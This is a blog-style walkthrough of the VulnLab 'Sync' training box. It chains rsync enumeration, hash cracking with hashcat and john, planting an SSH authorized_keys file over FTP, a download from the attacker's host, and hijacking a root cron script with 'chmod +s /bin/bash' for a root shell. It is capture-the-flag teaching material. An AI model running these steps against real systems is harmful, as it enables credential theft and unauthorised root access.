vulnlab-sync

vulnlab sync

an easy linux box

nmap scan

# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172
Nmap scan report for 10.10.93.172
Host is up (0.023s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA)
|_  256 18fd36c6a505b196147283f862d53821 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds

rsync enum

rsync -av --list-only rsync://10.10.93.172/

using rsync getting the source file of website

rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared

.

found that the hash is combination of three things $secure|$username|$password here the secure hash is working as salt

a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|

hashcat can crack this one

hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt

We can now ftp to the box ,make a folder .ssh , and upload there our authorized_keys file (id_rsa.pub)

┌──(puck㉿kali)-[~/vulnlab/sync]
└─$ ftp 10.10.93.172      
Connected to 10.10.93.172.
220 (vsFTPd 3.0.5)
Name (10.10.93.172:puck): triss
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41121|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||6569|)
150 Ok to send data.
100% |************************************************************************|    91      612.87 KiB/s    00:00 ETA
226 Transfer complete.
91 bytes sent in 00:00 (2.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||65353|)
150 Here comes the directory listing.
-rw-------    1 1003     1003           91 Aug 19 09:11 authorized_keys
226 Directory send OK.

.

ssh  -i ed_25519 triss@10.10.93.172

found a user in /etc/paswwd jenifier ,  su jennifer (with same pass as triss)

there is a zip file in the /backup directory that is  a backup owned by root.

timeout 60s ./pspy64

getting the zip

wget http://10.8.2.138:8000/1698154321.zip

unshadow

$ unshadow passwd shadow > unshadow

crack it

john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow

User sa has write permission to this shell script.

echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash

wait a minute

/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#

that’s all

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *